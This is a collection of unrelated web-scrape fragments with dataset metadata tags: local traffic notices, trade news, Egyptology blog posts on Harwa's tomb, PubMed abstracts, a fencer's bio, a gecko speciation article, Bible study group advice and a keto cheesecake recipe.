• A great pumpkin race for Meals on Wheels will be Saturday from 10:30 a.m. to 3 p.m. Closures and traffic restrictions will be in place on Madison Street from 17th to 18th avenues and on 18th from Monroe to Jefferson streets.
• The Muscular Dystrophy Association’s “fill the boot” fundraiser will be Friday from 2 p.m. to 6 p.m. and Saturday from 10 a.m. to 2 p.m. Firefighters and volunteers will be using the roadway at Alberta Street and Wellesley Avenue, so drivers should use caution.
• The Centennial Trail along the Spokane Convention Center is currently closed for installation of a new sewer line. The north bank of the Spokane River offers an alternate route.
• Rehabilitation of Rockwood Boulevard should be completed within the next two weeks, city officials said.
• In Spokane Valley, Eighth Avenue just east of Wilbur Court will be closed from 7 a.m. Tuesday through Oct. 29 for utility work.
• Dishman-Mica Road just south of Appleway Boulevard will have its northbound curb lane closed today from 1:30 to 3:30 p.m. for maintenance work. | {
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US-China trade war truce: Europe and Asia stock markets higher as Trump says China will halt new car tariffs
The winners of the US-China trade war so far
China’s exports to US grow despite US tariffs
China is working to exempt some U.S. agricultural products
China’s Customs Tariff Commission of the State Council said Friday that the country is working on tax exemptions on part of the soybeans and pork imported from the United States, a move that could take some heat out of talks aimed at agreeing on a truce in the trade war.
The committee will apply a range of goods to be excluded from tariff countermeasures against the U.S. Section 301 measure, it said.
In September, Beijing announced it would exclude some soybeans and pork products from its newest tariffs.
According to domestic needs, Chinese enterprises import a certain amount of goods from the United States through market-based procurement.
The enterprises are expected to purchase goods eligible for an exemption based on independent negotiation, import as they see fit, and bear the related profits or losses, the commission said.
China was the biggest market for US producers before Beijing retaliated against US tariffs. In 2018, exports of soybeans to China fell to $3.1 billion, down from $12.2 billion the year before.
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Pork producers are also concerned that they are missing out on a growing Chinese market, where demand has stimulated because of an outbreak of African swine fever that has ravaged China’s pig herds. | {
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Uncomfortable Situation Seal
talking to a new friend about cheating ex
turns out to be one of the girls he cheated with | {
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Harwa – Chief Steward of Gods Wife Amenardis I – XXV Dynasty of Ancient EgyptHarwa, “Grand Steward of the Divine Votaress”, High Priest and “Doorkeeper in the Temple of Amun”
Harwa: “Great of the Greats”.
Born in to a family of Theban Priests, Harwa held high office in Thebes (modern-day Luxor) with great responsibility to Amun and God’s Wife of Amun, the Divine Votaress, Amenirdis I. He was son of the “Lady of the House”, Nestaureret (or Estaweret), and of a Priest attached to the temple of Amun in Karnak, Padimut (or Pedemut) son of Ankhefenamon.
His tomb is located in el-Assasif, part of the Theban Necropolis, near to Deir el-Bahri and is known as TT37 (Theban Tomb 37) which has been under archaeological examination for some years and currently not accessible to the public.
http://amunirdis.blogspot.com/2009/02/harwa-chief-steward-of-gods-wife.html———————————http://pavementsofsilver.wordpress.com/2008/07/13/the-tomb-of-harwa/“On Friday I attended an EES lecture by Dr Francesco Tiradritti of the Italian Archaeological Mission to the Theban Tombs, held at the The Society of Antiquaries of London. It was a fascinating lecture, and I must admit that up until then I had known very little about the Late Period tombs in this area, so the talk was a true eye opener for me.
The renaissance, or Archaic Revival, of the Late Period has long held a fascination for me, and it’s normally something I think of as having been “kicked off” – as it were – by the Pharaohs of the 26th Dynasty. But these classical Saite signatures, such as the passion for (exquisitely executed!) scenes in the Old Kingdom traditions, and even the inclusion of parts of the Pyramid Texts, can be seen in Harwa’s tomb (TT37, El Assasif) at the height of the 25th Dynasty.
Harwa was the Great Steward of the Adoratrice of Amun, during the reign of Taharqa, and possibly acted as a vassal ruler of the south under him, since the Pharaohs of the 25th Dynasty remained in Nubia and only held power through the Priesthood of Amun, hence Harwa’s great importance. The scale of his tomb would indeed suggest this, for although it’s layout is entirely different, in it’s ambitious design, and in the quality of carving, it is certainly the equal of some royal tombs.
Sadly, time has been unkind to Harwa’s eternal home. Only fragments of the decoration survive, having been re-used for subsequent burials during the Late period, and functioning as a chapel to Osiris in Ptolemaic times. Dr Tiradritti also presented some of the tombs later history that had been unearthed during excavations, including an earlier Italian visit to the tomb by soldiers during the Second World War, leaving behind part of a biscuit packet for future generations.
Thankfully, the team have been able to take advantage of changes in technology over the long course of their work so far (excavation began in 1995, and there is still much work to be done) and this has allowed maps, images and also a complete catalogue of decorative fragments found to be made available on an online database. This has also allowed for digital reconstructions of numerous wall scenes to be made, allowing a much better understanding of the tombs original design.
A multi-lingual web portal has now been online for ten years, and is available at http://www.Harwa.it/ ”http://pavementsofsilver.wordpress.com/2008/07/13/the-tomb-of-harwa/trackback/
“An end and a beginning
On March 23, 2007 the Elizabeth A. Sackler Center for Feminist Art opens at the Brooklyn Museum. To celebrate the opening and the accompanying exhibition, “Pharaohs, Queens and Goddesses”, we decided to devote the last posting of the 2007 season at the Mut Precinct to some of the female figures, mortal and divine, associated with the site.
Hatshepsut being crowned by Amun-Re and granted life and dominion by the goddess “Great in Magic”, from the reconstructed Red Chapel in the Karnak Open Air Museum. An early 18th Dynasty temple at Mut dates to the reign of this woman who ruled as king.
“God’s Wife of Amun” was an important female priestly title in Thebes. In the 1st millennium BC it was usually held by a sister or daughter of the reigning king, each God’s Wife adopting her successor. They became so powerful that they were able to have themselves represented in roles normally played by the king.
In scenes of goddesses suckling humans, the human is normally the king, with the scene representing the transfer of life and power. Yet in this scene in the Chapel of Osiris-Ruler-of-Eternity at Karnak, not only is the God’s Wife of Amun, Shepenwepet I, being suckled, she is also wearing 2 Double Crowns, something shown nowhere else in any period.
In her funerary chapel at the temple of Medinet Habu, Amunirdis makes offerings to Amun and Hathor. The presence of funerary chapels to mortals within the sacred grounds of a temple is rare until the Third Intermediate Period, a time when God’s Wives of Amun flourished.
Intangible concepts could also be represented as goddesses. In a scene commemorating an important military campaign by Sheshonq I of Dynasty 22, the goddess “Victorious Thebes”, carrying a mace, an axe and a bow, drags conquered cities (shown as bound prisoners with the city names enclosed in cartouches representing fortified walls) to be slaughtered.
Upper and Lower Egypt were represented as the goddesses Nekhbet (right) and Wadjet. Scenes of the king flanked by these protective deities are common in all periods of Egyptian history. This one comes from the Mut Precinct’s Ptolemaic Chapel D.
Keeping Mut and Sakhmet happy was a main function of the Mut priesthood. In this scene from the Mut Precinct’s main entrance the king (holding Hathor-headed sistra) and two priestesses play music to Mut and Sakhmet to amuse them and keep them contented.
Two busts of Sakhmet in the Mut Precinct. Sakhmet angered could release disease and disaster on Egypt. Contented she could control these forces, which is why she is a goddess of health and healing as well as of death and destruction.
These 3 reliefs of Mut span a period of several hundred years. On the left is a relief from Amunirdis’s funerary chapel at Medinet Habu; in the center a relief from the chapel of Osiris-Ruler-of-Eternity at Karnak; and on the right a relief in Chapel D at the Mut Precinct. In all three scenes Mut appears in her usual guise of a human wearing the Double Crown.
And finally, a stela of a king offering to Mut that we uncovered in 2006. While the stela is uninscribed, it is entirely possible that it dates to the reign of the Roman Emperor Tiberius, showing that Mut continued as an important goddess even after Egypt’s conquest by Rome.
Harwa was an important man in ancient Egypt. He was an important figure in the life of Amenirdis I of ancient Egypt’s XXV Dynasty. He acted as the ‘Chief Steward’, or ‘Grand Steward’ for Amenirdis I, as God’s Wife of Amun and also whilst Queen Amenirdis served as Divine Adoratrice. Additionally, he held the title (as High Priest) of “Doorkeeper in the Temple of Amun”.
Born in to a family of Theban Priests, Harwa held high office in Thebes (modern-day Luxor) with great responsibility to Amun and God’s Wife of Amun, the Divine Votaress, Amenirdis I. He was son of the “Lady of the House”, Nestaureret, and of a Priest attached to the temple of Amun in Karnak, Padimut son of Ankhefenamon.
His tomb is located in el-Assasif, part of the Theban Necropolis, near to Deir el-Bahri and is known as TT37 (Theban Tomb 37) which has been under archaeological examination for some years and currently not accessible to the public.
The tomb of Harwa (TT37) displays important features of a man holding such religious, spiritual and political power. Scenes and texts – at least those engraved in the principal axis of the monument – can be read as part of a description of the Egyptian man’s journey from his daily life to the Netherworld, passing through the ultimate experience of death and beyond. Each part of the monument concurs to document a different step of the path leading to eternal life.
The tomb (TT37) is large and in the “Osiris Hall” there is a wall relief describing the moment of the death where Harwa is shown ‘between worlds’, and separated from his physical body, with Anubis holding one hand. Harwa then exists in two dimensions – in the Land of Osiris and still in the land of the living, just. Harwa’s tomb shows the moment of death in its supreme glory and Harwa continues to be shown ‘in the middle’, almost in a freeze-frame relief with both his Ka and brain conscious. This is highly unusual in ancient Egyptian scenes.
A text well-engraved on the southern wall of the passage leading to the First Pillared Hall enumerates his good deeds having recourse to the most typical phraseology of the Egyptian “ideal biography”. It is Harwa himself who is speaking.
He tells the visitor to the tomb: “I gave bread to the hungry man, clothes to the naked man”.
This phrase is pivotal in the connection between Harwa and Queen Amenirdis I as, on the reverse (and base) of the famous alabaster statue of Amenirdis I, there is a well-carved series of hieroglyphs which say:
“I gave food to the hungry, drink to the thirsty, clothes to the naked man.”
The full translation can be found here:
I have not seen a connection made anywhere regarding these two series of hieroglyphs – online or offline. I believe that this connection hasn’t yet been made by the scholars but the importance of the similar phrases is amazing to me.
Harwa held the position of “Grand Steward” for about forty years from the time of Piankhy, serving under Nubian pharaohs Shabaqo or Shabaka (713-698 BCE) and Shebitqo (698-690 BCE), until the reign of Taharqo or Taharqa (690 – 664 BCE).
‘Coincidentally’, Amenirdis I is said to have served as God’s Wife of Amun, Divine Adoratrice (or Divine Votaress) and “God’s Hand” for approximately forty years.
[Taharqo (or Taharqa) was the uncle of Amunirdis.]
It is my personal belief that Amenirdis I and Harwa had a close relationship and ruled ‘together’ (under various roles) from ancient Thebes at approximately the same times in ancient Egypt.
During the 1997 archaeological campaign in Harwa’s tomb (TT37), a limestone ushabty (or shabti) was unearthed showing features which shed new light on some aspects of the role played by Harwa inside the Theban administration. It is a typically mummiform funerary statuette of the XXV Dynasty but it holds in his hands the crook and the flail, that is to say, the regalia, the characteristic emblems of the pharaonic royalty.
As far as it is known, it is the only example of non-royal ushabty displaying such a characteristic.
Furthermore, in the Chapter VI of the Book of the Dead engraved on the body, Harwa is mentioned as “Great of the Greats”.
These evidences should point out that Harwa had more power than the one deriving from his role and that he can be considered as the co-governor of the Theban region on the behalf of the Nubian King alongside the Divine Adoratrice, Amunirdis I.
Also the vastness of his tomb and the high number of his statues can support the hypothesis that Harwa was the most politically influential person of the State; stretching to the First Cataract (a graffito signed by him has been found at Nag’esh Sheikh, near Aswan).
If this assumption is confirmed by further excavations, then the positions of Montuemhat and Petamenophis will have to be reconsidered. They chose in fact to place their tombs east and west of the tomb of Harwa as if they attributed a high reverence to him and considered him a sort of ancestor. In this frame one has to ask: is it possible to speak of a “dynasty” of functionaries governing the Theban region with the consent of the Nubian kings? If this proves to be true, then, as they did not belong to the one family nor did they share the same titles and position, what was the mechanism of succession of these functionaries? No-one yet knows the answer to that question or the countless others raised by the life, works and tomb of Harwa, Grand Steward in the Precinct of Amun.
Many questions are raised merely because of the surviving evidence belonging to Amenirdis I and Harwa but there are some issues which are quite clear:
Upper Egypt was ruled well under the governance of these two mighty figures (and others) and for forty years, approximately, Upper Egypt was relatively peaceful (as opposed to the XXIII to XXIV Dynasties political and religious unrest and turmoil) whilst Pharaoh Shabaka (Amunirdis I’s brother) ruled from Memphis. Even after the death of her brother, Amunirdis I remained in control and acted, along with others, as the First Prophet of Amun, answering the State’s needs on many levels. Order was temporarily restored and both Amunirdis I and Harwa played a major role in ancient Egypt at that time.
If you would like to read more about Harwa, please see these web sites: | {
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Biocompatibilities of organic solvents with Lactobacillus delbrueckii.
In the search for biocompatible extractants for extractive fermentation of lactic acid, the effect of twelve organic solvents on the activity of L. delbrueckii were studied at different concentration levels. On this basis, the compatibilities of twelve solvents with L. delbrueckii were summarized into four classes: completely compatible, compatible at molecular level, partially compatible and non-compatible. The characteristics were described qualitatively for each class in terms of relative values between the solubility of organic solvent in water (Cs) and the toxicity of organic solvent, which is indicated by a newly defined concentration parameter (Cm). The classification was helpful for the selection of extractant in extractive fermentation. | {
"pile_set_name": "PubMed Abstracts"
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[Perioperative prevention of thrombosis in cesarean section: results of a randomized prospective comparative study with 6% hydroxyethyl starch and 0.62 low dose heparin].
In 207 consecutive randomized women undergoing cesarean section, of whom 104 received 3 X 5000 IE unfractionated heparin and 103 3 X 500 ml hydroxyethylstarch 6% 0.62, the frequency of deep vein thrombosis was evaluated with a non-invasive diagnostic technique-impedance plethysmography. 5.9% of the patients in the hydroxyethylstarch group and 7.8% in the heparin-group developed deep vein thrombosis. Activation of blood coagulation at cesarean section results in an increasing of factor VIIIR:Ag, Fibrinogen and Reptilase clotting time. Hydroxyethylstarch 6% 0.62 produces minor abnormalities of coagulation test results. After 1500 ml infusions HES the following effects were noted: 1. Factor VIIIR:Ag fell by about 20%, a greater decrease than could be explained simply by hemodilution. 2. Reptilase clotting times shortened without a different increase in fibrin activation products (resulting in an increased lysability of the thrombus). 3. Plasma fibrinogen decreased by approximately 7% due to hemodilution caused by plasma volume expansion. For patients with a low risk of deep vein thrombosis (Cesarean section) HES has an excellent safety record in doses not exceeding 1500 ml/24 h. | {
"pile_set_name": "PubMed Abstracts"
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Jeppe Normann
Jeppe Normann (born 15 September 1951) is a Norwegian fencer. He competed at the 1972, 1976 and 1984 Summer Olympics.
Category:1951 births
Category:Living people
Category:Norwegian male fencers
Category:Olympic fencers of Norway
Category:Fencers at the 1972 Summer Olympics
Category:Fencers at the 1976 Summer Olympics
Category:Fencers at the 1984 Summer Olympics
Category:Sportspeople from Oslo | {
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New gecko species identified in West African rain forests
June 1, 2010
The West African forest gecko, Hemidactylus fasciatus, is secretive but common in the tropical rain forest patches stretching nearly 3,000 miles from the coast of Sierra Leone to the Congo. Two post-docs -- former UC Berkeley students -- have now determined that the gecko is at least four distinct species scattered through isolated patches of forest across West Africa. Credit: Charles Linkem
The West African forest gecko, a secretive but widely distributed species in forest patches from Ghana to Congo, is actually four distinct species that appear to have evolved over the past 100,000 years due to the fragmentation of a belt of tropical rain forest , according to a report in this week's issue of the journal Proceedings of the Royal Society B.
The discovery by former University of California, Berkeley, students Adam D. Leaché and Matthew K. Fujita demonstrates the wealth of biodiversity still surviving in the islands of tropical rain forest in West Africa, and the ability of new DNA analysis techniques to distinguish different species, even when they look alike.
"We tended to find this gecko, Hemidactylus fasciatus, throughout our travels in West Africa," said Leaché, a herpetologist with UC Berkeley's Museum of Vertebrate Zoology. "Despite the fact that it is recognized as one species, using new methods we have established a high probability that it is composed of at least four species."
Though the forest fragmentation is part of a long-term drying trend in West Africa, the loss of forest and the resultant impact on the gecko is increasing as a result of human activity, he noted.
"These rain forests are classified as one of the biodiversity hotspots on the planet, yet they are one of the most endangered areas on the earth," Leaché said. "Human deforestation is accentuating the process of habitat destruction."
Leaché, currently a post-doctoral fellow at UC Davis but soon to become an assistant professor of biology at the University of Washington, has mounted five expeditions since 2003 to the tropical rain forests of West Africa to survey reptile and amphibian populations. All of the forest patches are isolated, some requiring hours of hiking to reach, and many are protected in national parks. Access was often difficult because he had to hire porters to carry liquid nitrogen with which to preserve tissue specimens of rare species, plus pickling containers in which to bring home more common animals, including the forest gecko.
"Out intent was to go to remote sites where people haven't done much exploration to try to document biodiversity in Africa," he said.
Having collected numerous specimens of the six-inch gecko, he and Fujita, who accompanied Leaché on several of the expeditions, decided to see whether genetic diversity among the geckos could tell them something about the history of the rain forest belt. That belt stretches nearly 3,000 miles from the coast of Sierra Leone through the Guinean rain forest in Ghana, through Nigeria and Cameroon, to the Congolian rain forest. Over millions of years, the forest has expanded and shrunk with climate change, and an aridification trend over the past several hundred thousand years has caused the forest to contract to mountainous areas, Leaché said.
Leaché and Fujita found sufficient genetic differences among the 50 geckos collected from 10 different forest patches to identify four distinct species. The different species were found in different forest patches, suggesting that the species divergence was driven by the isolation of gecko populations from one another after gaps developed in the rain forest.
Not all of the species were separated by forest gaps, however. The wide Sanaga River in Cameroon is the dividing line between two species, which the researchers named Hemidactylus coalescens and Hemidactylus eniangii, the latter in honor of Nigerian conservation biologist and herpetologist Dr. Edem A. Eniang.
They retained the name Hemidactylus fasciatus for the westernmost species, which ranges from Sierra Leone to the wide Dahomey Gap, but identified an isolated species, Hemidactylus kyaboboensis, in the Togo Hills, which they named after Kyabobo National Park in the Volta Region of Ghana.
A key component of their research was testing a different statistical method, called Bayesian species delimitation, that provides odds that researchers are correct when naming a new species.
"This method gives you a probability associated with the number of species identified, something we haven't been able to do in speciation research until now," Leaché said. "Before, it was more of a qualitative assessment. Here, we get a quantitative assessment, which is reassuring."
As a result, the researchers were able to state with high probability - essentially 100 percent that the specimens break down into four species.
Fujita, formerly of UC Berkeley's Museum of Vertebrate Zoology and now a post-doctoral fellow at Harvard University's Museum of Comparative Zoology, took tissue samples from the specimens and conducted the Bayesian analysis. The analysis involved five genes from the cell nucleus and one gene from the mitochondria.
Leaché plans to continue his biodiversity survey of West Africa, but also to look more closely at the forest gecko to see what observable differences - size, shape or scale arrangement, for example - can be used to confirm and identify the four species.
An expedition led by the Wildlife Conservation Society (WCS) to a remote corner of the eastern Democratic Republic of Congo has uncovered unique forests which, so far, have been found to contain six animal species new to ...
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The chart-topping team of Joss Whedon & John Cassaday are teaming up once again to celebrate Captain America's 75th anniversary, ComicBook.com has confirmed with Marvel. Appearing in Captain America: Sam Wilson #7, the two will tell an all-new story celebrating the legacy and legend of Captain America. The issue will also feature a main story from series creative team Nick Spencer & Daniel Acuna, and another backup by Greg Rucka & Mike Perkins.
Whedon & Cassaday first hit the scene together in 2004 with Astonishing X-Men which was a runaway train of success both critically and in sales. The two brought about the return of Colossus and even had an aspect of their story adapted in X-Men: The Last Stand. Whedon & Cassaday also introduced many new X-Men characters to the Marvel Universe including, Blindfold & Armor.
Cassaday is no stranger to Captain America, having drawn an issue of Fallen Son: The Death Of Captain America and a Captain America limited series with John Ney Riber.
Captain America: Sam Wilson #7 has a final order cutoff of March 7th and will hit comic shops everywhere on March 30th.
So what do you think ComicBook.com readers? Are you excited to see Joss Whedon & John Cassaday together again? Let us know in the comments below! | {
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} |
Fellowship is so much more than events. I sometimes describe biblical fellowship as “a common lifestyle shared by people with common values, making similar sacrifices, and experiencing common communal experiences.”
People who live a life of biblical fellowship are authentic and vulnerable with one another, meet one another’s needs, and do life together — truly. Bible study groups who enjoy biblical fellowship can honestly say that they have shared laughter and tears.
This kind of fellowship seldom happens if the only time a group gets together is for group meetings. Gatherings away from the group time are essential if the group is going to experience transformational fellowship.
Following are a list of options that may be helpful to you and your group as you brainstorm ideas of things you can do together this winter.
Gather around a bonfire snacks and conversation.
Go on a snow skiing adventure.
Host a game night to unleash everyone’s competitive side.
Have a viewing party for the NCAA men’s basketball Final Four.
Enlist group members to open their homes for a progressive dinner.
Go sledding in a local park.
Attend a concert together.
Venture out for a night of karaoke. (This may not be for all groups.)
Enjoy a movie night at someone’s home or go to the theater together.
Get together to watch an awards shows on television.
We would love to hear your and experiences. What are some things your group has done that aren’t listed?
We’ve all been there. Sitting in a living room, having just finished a Bible study, your small group now turns to a time of prayer by soliciting requests. Sally shares about her cat Freckles. Freckles is old and has a bad hip—so she asks for healing for Freckles. You can’t quite imagine the apostle Paul praying for his sick cat, but you don’t want to be a jerk so you join the others by bowing your head and praying for Freckles.
Something doesn’t seem quite right, but you’re not sure why. This repeats itself throughout the meeting and from week to week. A single man shares about being really busy at work and requests prayer for energy. A couple shares about their upcoming trip to Colorado and asks for traveling mercies. Someone else shares about his second cousin just diagnosed with breast cancer. Your group dutifully bows their heads in earnest prayer. A newly married couple in the group shares a praise: marriage has been better than they could have ever imagined. Smiles and prayers of thanksgiving go up to God.
You wonder, Is this what small group prayer is all about? The prayer requests are near and dear to each person who shares, yet they seem to lack depth. They’re not shallow, but they’re also not substantive and seem to miss the bigness of God. They hover on the surface when your group is longing to go deeper with one another and with God. What should you do?
Navigating the Tension
There is a tension in prayer. We don’t want to be cynical, hard-hearted, nit-picking prayer police who point out the shallowness of other peoples’ requests. And we know that God desires for his people to pray with freedom to ask God for anything. Jesus doesn’t just throw out things like “ask whatever you wish, and it will be done for you” (John 15:7) without really meaning it. If Jesus meant you can only pray for the really important or spiritual stuff he would have said so.
Yet Jesus makes answers to prayer conditioned on faith (Matt. 21:22), asking in Jesus’s name (John 14:14; 16:24), abiding in Christ (John 15:7), persistence (Luke 18:1-8), having right motives (Jas. 4:3) and asking according to his will (1 John 5:14). And then we get verses that tell us just to ask (Matt. 7:7-11), to pray without ceasing (1 Th. 5:17) and to bring all of our anxieties and concerns to God in prayer (Phil. 4:6). So what should we do if our small group prayer times seem unusually skewed towards asking for stuff (petition), interspersed with some prayers of thanksgiving? What do we do if many of the things we pray for skim along the surface without ever getting deeper?
Praying is a learned skill that takes time, discipline, and work. Corporate prayer is shallow because private prayer is infrequent. Recognize that we all have room to grow in learning to pray to God together. Be gracious with one another. Yet learn to guide a small group’s prayer time. Here are a few suggestions.
1. Remind the group what they’re doing.
Asking, “We have about 15 minutes left, anybody have a prayer request?” will inevitably solicit shallow and circumstantial requests of the “daily bread” variety. The way you’ve framed the time has devalued its very significance. Take the opportunity to remind the group what prayer is. Instead of saying, “Any prayer requests?” ask, “Now as we move from studying God’s Word to praising him through prayer, what are some things God’s Word has revealed to us?” Remind the group that prayer is communicating with the God of the universe through the access purchased for us by the costly sacrifice of the Son and enabled by the indwelling Holy Spirit. We can reflect back to God praise, adoration, thanksgiving, confession, and petition in light of his revelation. We are approaching a holy God through the mediation of his beloved Son, in whom we have union and fellowship. Help the group be awed by what they will embark upon so that the oft-neglected aspects of small group prayer—praise, adoration, confession, and thanksgiving—will become natural responses to what God has revealed.
2. Let Scripture guide your prayers.
If your group has just concluded a spirited study of a passage of Philippians (or whatever book you’re studying), keep your Bibles open and let Scripture guide your time of prayer. God’s revealed Word provides the content and trajectory for our prayers. Pray the commands from the passage you just studied, asking God to help you obey. Praise God for truths revealed in the passage, thanking him for who he is and how his power, wisdom, and majesty are revealed. Let the Scriptures guide how you pray. If you group has discerned the “big idea” from the passage, pray for those revealed truths to transform you, your small group, church, community, and world. If you’ve glimpsed an aspect of God’s character, thank God for revealing it to you and praise him for his unchanging character. Ask for God’s name to be hallowed in your life, in your community, and among the foreign peoples where your church missionaries are ministering.
Tim Keller, in his book Prayer: Experiencing Intimacy and Awe with God, describes Martin Luther’s method of meditating upon a passage by discerning the instruction of the text (what does the text demand of me?) and then turning it into thanksgiving (how does this truth lead me to praise or thank God?), confession (how does this truth lead me to confess and repent?) and petition (how does this truth prompt me to appeal to God?). Providing your group a simple grid to move from the study of God’s Word to praying God’s Word will broaden the content of your prayers.
3. Get to the heart of the issue.
Many of us do not naturally discern what we really need. But Scripture opens our eyes to see our true needs in light of God’s holiness, power, grace, and love. Perhaps someone shares a prayer request about being busy at work. This requires more information to know how to pray. To pray for more hours in a day or for this person to magically become more efficient is not likely to happen. Ask a few questions to better discern how to pray for this person. Is he busy because of a demanding and overbearing boss? If so, how can he live out his role as a God-honoring employee and make wise decisions on talking with his boss or prioritizing his workload? Is his busyness merely a symptom of an unhealthy desire to succeed, please others, or make the most money possible? Does he idolize his own success and the admiration he receives from others? Does he need to grow in contentment, gratefulness, and joy?
God cares about our “daily bread” requests, but he’s also interested in exerting his kingdom and will in our hearts and minds. God is conforming us to his image from the inside out. So for Sally’s cat Freckles, you can pray not merely for the health of the cat, but more importantly, for Sally’s fear, anxiety, and loneliness that are being revealed.
4. Let Scripture evaluate your prayers.
Scripture is the best judge of our prayers. Do we generally communicate with God in various types of prayer (adoration, confession, thanksgiving, and supplication) or do we typically just list off our requests? Do we begin by praising God for his character and asking for his name to be hallowed as the Lord’s Prayer instructs? Furthermore, Scripture helps us discern why some of our prayers are actually unbiblical. Praying for a new Lexus to show up on your doorstep probably doesn’t pass muster for being “daily bread.” Keller writes, “One way petitionary prayer can actually do us harm is if we see it as a means to say to God, ‘My will be done.’ We are prone to indulge our appetites, telling God in no uncertain terms how he should run the universe. Such prayer neither pleases God nor helps us grow in grace.” Does your small group just repeat and rephrase the request—“I pray for healing for Nancy’s cancer”—or do you apply the gospel of Christ to the situation? Pray for healing from cancer, but also pray for joy and trust in Christ, confidence in her eternal destiny, patience with nurses and doctors, opportunity to encourage and witness to others, and ultimately that God would be glorified through this trial.
More could certainly be said about cultivating a safe space for confession during a small group prayer time, following up prayer requests with questions of how things have gone, or praying for each other throughout the week. Yet the reality that we can approach a holy and awesome God together should awaken in us delight, joy, and praise that is reflected back to God in our prayers. Our ability to have access to God, corporately and individually, is blood-bought by the Savior. We pray to know and love God—not merely to list our requests. We pray to declare, again and again, that God is God and we are not, and to be amazed, humbled, and grateful for the blood of Jesus that makes it possible for us to approach the throne of grace.
Asking great questions is as much an art as it is a skill. But developing that question-asking muscle is essential for great leadership. Asking great questions is the most effective thing a leader can do to create conversational environments where people can experience healthy relationships and spiritual growth.
Jesus did this better than anyone in history. In the Gospels, he’s asked a ton of questions — everything from “Are you the Son of God?” to “Which is the greatest commandment in the law?” He rarely responds with an answer. Instead, he tends to ask questions that lead people to consider the truth, think about their own experiences, and reflect. Jesus understood that asking great questions helps people to process what they’re thinking and feeling and to really own the answers they discover. Providing quick, simple answers doesn’t usually do that.
When it comes to asking great questions, Jesus sets the bar high. You probably won’t be as quick or insightful as he was (I’m not, that’s for sure). But it’s still a great idea to work on your question-asking skills, and to look to Christ for inspiration. You won’t change overnight, but in time you’ll find that your ability to ask better questions will create a better environment for your group members to grow.
Here are five simple, self-explanatory tips for asking great questions in group:
Ask open-ended questions, not those that can be answered with a yes or no.
Ask questions that evoke feelings, make people think, and lead to insights.
Ask questions that have more than one right answer.
Ask questions that encourage group members to share personal examples.
Ask questions that stimulate group members to apply what they’re learning.
Responding to questions by asking good follow-up questions engages everyone in the group. As you guide the conversation, make sure responses connect your questions to the topic you’re discussing, pave the way for you and your group members to talk about your personal struggles, and encourage self-discovery by allowing people to arrive at their own conclusions with the help of the group discussion. | {
"pile_set_name": "Pile-CC"
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Every household in Wandsworth is within 1km of a recycling bank site. At most of these sites you can recycle paper, card, glass and cans. At some larger sites you can also recycle clothes, shoes, printer cartridges and books with funds raised going to a variety of charities. | {
"pile_set_name": "Pile-CC"
} |
Health Benefits
Here you’ll find detailed coverage information on each of our plans and how they work. You can choose between a variety of medical plans through Cigna and Kaiser, dental through Cigna and vision through VSP. The plans are not bundled and you can enroll in any plan individually or in a combination of plans. | {
"pile_set_name": "Pile-CC"
} |
Endoscopic resection of advanced and laterally spreading duodenal papillary tumors.
Historically, neoplasia of the duodenal papilla has been managed surgically, which may be associated with substantial morbidity and mortality. In the absence of invasive cancer, even lesions with extensive lateral duodenal wall involvement, or limited intraductal extension may be cured endoscopically with a superior safety profile. Endoscopic papillectomy is associated with greater risks of adverse events such as bleeding than resection elsewhere in the gastrointestinal tract. Additionally site-specific complications such as pancreatitis exist. A structured approach to lesion assessment, adherence to technical aspects of resection, endoscopic management of complications and post-resection surveillance is required. Advances have been made in all facets of endoscopic papillary resection since its introduction in the 1980s; extending the boundaries of endoscopic cure, optimizing outcomes and enhancing patient safety. These will be the focus of the present review. | {
"pile_set_name": "PubMed Abstracts"
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Total parenteral nutrition with and without fat as substrate for growth of rats and transplanted hepatocarcinoma.
Differential effects of total parenteral nutrition (TPN) on host nutrition and growth of cancer are unclear. Growth of adult ACI-N rats bearing transplanted Morris hepatocarcinoma no. 3924A given TPN with or without fat was studied in comparison with Purina Chow-fed, fasting, and semifasting (either amino acid or dextrose alone) rats over 5 days. The isocaloric, isonitrogenous TPN regimens with or without fat maintained body weight and nitrogen balance of cancer-bearing rats equally well. When compared with Chow-fed rats, the volume of the cancer, its weight, doubling time, protein content, and incorporation of thymidine into DNA were similar in rats given TPN either with or without fat. Although the volume of the cancer decreased in fasting and semifasting rats, the nutritional status of the host was also impaired. Administration of TPN to cancer-bearing rats was associated with an abnormal increase in serum lactic acid level, which was not ameliorated by the use of fat to reduce the carbohydrate load. Although TPN with and without fat maintains the nutritional status, hepatomegaly and hepatic steatosis limit the administration of carbohydrate and fat as energy substrates in this system. | {
"pile_set_name": "PubMed Abstracts"
} |
Cheesecake recipes are a dime a dozen on the keto diet. They’re the perfect low carb, high fat food – being comprised primarily of delicious cream cheese – so they’re a common go-to for a keto-friendly dessert. However, most of the cheesecake recipes I’ve tried have seemed a little… off. They had a funky texture or you could taste the fake sugars in them. And let’s not even get started on no-bake or jello cheesecakes… I am a cheesecake connoisseur over here, and if you’re going to take the time to make a cheesecake, it needs to be a big and dense New York-style concoction.
Growing up, I was inundated with desserts in my family. My Gran-Gran, Meemaw, mom, and a veritable slew of aunts and great-aunts can cook almost anything. But the one thing that no one in my family had perfected was cheesecake. So a few years ago, when my Mom asked for one for her birthday, I set out to become the lone cheesecake cook.
Let’s just say we ate a lot of cheesecake in the week leading up to her birthday, and I hadn’t really felt like making it since.
But I had totally perfected it.
And so last week, when I began to think of what I could bake to take to our end-of-the-project bash at work and/or Easter with the family, my thoughts returned to that perfect, New York-style cheesecake. I dug up that original recipe and realized that I could alter it quite easily to fit low carb parameters. But would it taste the same, and would it have that same dense and creamy texture?
Spoiler alert: it does.
Allow me to go ahead and apologize for the pictures. I may have gotten a little… overzealous… with the whipped cream (as my cousin said, “playing Cheesecake Factory is my favorite game!”). It was also dark and dreary and the lighting is meh. But whatever. Just hone in on that sweet, cold and creamy cake paired with those delectable, juicy and ripe red strawberries… and the mountains of whipped cream. But I digress.
For the crust,
1/2c almond flour
1/2c golden flaxmeal
1/2c pecan pieces
4T coconut oil
cinnamon to taste
Splenda or sweetener to taste
For the filling,
4 8oz packages of cream cheese
1c sour cream
4 eggs
1c Splenda, or equivalent sweetener of your choice
3/4c heavy cream
1/4c coconut flour
1T vanilla extract
3T sugarfree Torani syrup; this time I used French Vanilla (and next time I’m totally going Salted Caramel)
